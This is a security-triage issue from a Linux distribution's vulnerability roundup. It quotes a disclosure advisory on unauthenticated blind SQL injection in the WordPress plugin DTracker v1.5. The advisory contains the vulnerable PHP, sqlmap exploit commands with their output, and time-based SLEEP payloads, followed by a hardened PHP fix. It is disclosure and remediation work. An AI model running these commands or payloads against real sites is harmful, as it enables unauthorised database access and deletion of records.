Instructions:

Identification

Identify if we have the software in 16.09, 17.03, and unstable. Then determine if we are vulnerable, and comment with your findings. It is also helpful to say whether you think there is a patch, or whether it can be fixed via a general update.

Example:
    unstable: we are not vulnerable (link to the package)
    17.03: we are vulnerable (link to the package)
    16.09: we don't have it packaged
IMPORTANT: If you believe there are possibly related issues, bring them up on the parent issue!
Patching
Start by commenting on this issue saying you're working on a patch, so that work isn't duplicated.
If you open a pull request, tag this issue and the master issue for the roundup.
If you commit the patch directly to a branch, please leave a comment on this issue with the branch and the commit hash, for example:
Thu, 09 Mar 2017 07:57:13 -0500 "Larry W. Cashdollar", C3D0A2F5-941D-4030-9910-57C3E46053E1@me.com
Title: Multiple Blind SQL injection vulnerability in WordPress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-IDs: CVE-2017-1002004 CVE-2017-1002005
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-08
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=183
Description: Track the details of the users downloading the pdf files from wordpress site.
Vulnerability:
CVE-2017-1002004:
In file ./dtracker/download.php user input isn't sanitized via the id variable before adding it to the end of an SQL query.
$doc_id = $_GET['id'];
$file = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " );
The user does not need to be authenticated to the WordPress installation to exploit this vulnerability.
CVE-2017-1002005:
In file ./dtracker/delete.php user input isn't sanitized via the contact_id variable before adding it to the end of an SQL query.
$contact_id = $_POST['contact_id']; //Contact ID to be deleted
$query = "DELETE FROM wp_contacts WHERE id = $contact_id";
$wpdb->query($query); // Delete the contact
The user does not need to be authenticated to the WordPress installation to exploit this vulnerability.
Exploit Code:
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*' --dbms mysql --level 3 --risk 3

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END)
---
[10:14:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[10:14:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 14 times
[10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*' --dbms mysql --risk 1 --level 3

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
---
[11:53:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
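A hardened version of the two fragments quoted in the advisory, written for this issue as an added example (not DTracker's own code and not a vendor patch): both queries bind the id with a `$wpdb->prepare()` placeholder, and delete.php additionally requires a privileged, nonce-protected request. It assumes a loaded WordPress environment and a hypothetical nonce action name.

```php
<?php
// Added example, not DTracker's code. Assumes WordPress core is loaded
// ($wpdb, absint, current_user_can, wp_verify_nonce, wp_die);
// the nonce action 'dtracker_delete_contact' is a hypothetical name.

// ---- download.php (CVE-2017-1002004) ----
// Vulnerable original:
//   $doc_id = $_GET['id'];
//   $file = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " );
// Whatever arrives in ?id= is spliced into the statement text.

// Hardened: coerce to a non-negative integer, reject 0, bind with %d.
$doc_id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
if ( 0 === $doc_id ) {
    wp_die( 'Missing or invalid document id.', '', array( 'response' => 400 ) );
}
$file = $wpdb->get_results(
    $wpdb->prepare( "SELECT * FROM {$wpdb->posts} WHERE ID = %d", $doc_id )
);

// ---- delete.php (CVE-2017-1002005) ----
// Vulnerable original:
//   $contact_id = $_POST['contact_id'];
//   $wpdb->query( "DELETE FROM wp_contacts WHERE id = $contact_id" );
// Two defects: no authentication/authorization, and string interpolation.

// Hardened: require a capable user and a valid nonce, then bind with %d.
if ( ! current_user_can( 'manage_options' ) ) {
    wp_die( 'Forbidden.', '', array( 'response' => 403 ) );
}
$nonce = isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '';
if ( ! wp_verify_nonce( $nonce, 'dtracker_delete_contact' ) ) {
    wp_die( 'Invalid request token.', '', array( 'response' => 403 ) );
}
$contact_id = isset( $_POST['contact_id'] ) ? absint( $_POST['contact_id'] ) : 0;
if ( 0 === $contact_id ) {
    wp_die( 'Missing or invalid contact id.', '', array( 'response' => 400 ) );
}
// {$wpdb->prefix}contacts resolves to wp_contacts under the default prefix.
$deleted = $wpdb->query(
    $wpdb->prepare( "DELETE FROM {$wpdb->prefix}contacts WHERE id = %d", $contact_id )
);
```

With `%d` the value is cast to an integer before it reaches MySQL, so the time-based payloads in the sqlmap output above no longer parse as SQL; the capability and nonce checks close the unauthenticated deletion independently of the injection.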
Here is a report from the oss-security mailing list for Vulnerability Roundup 27.
Upon Completion ...

Info

Triage Indicator: should the search term be changed from "wordpress"? Suggest a new package search by commenting.

Known CVEs: CVE-2017-1002004, CVE-2017-1002005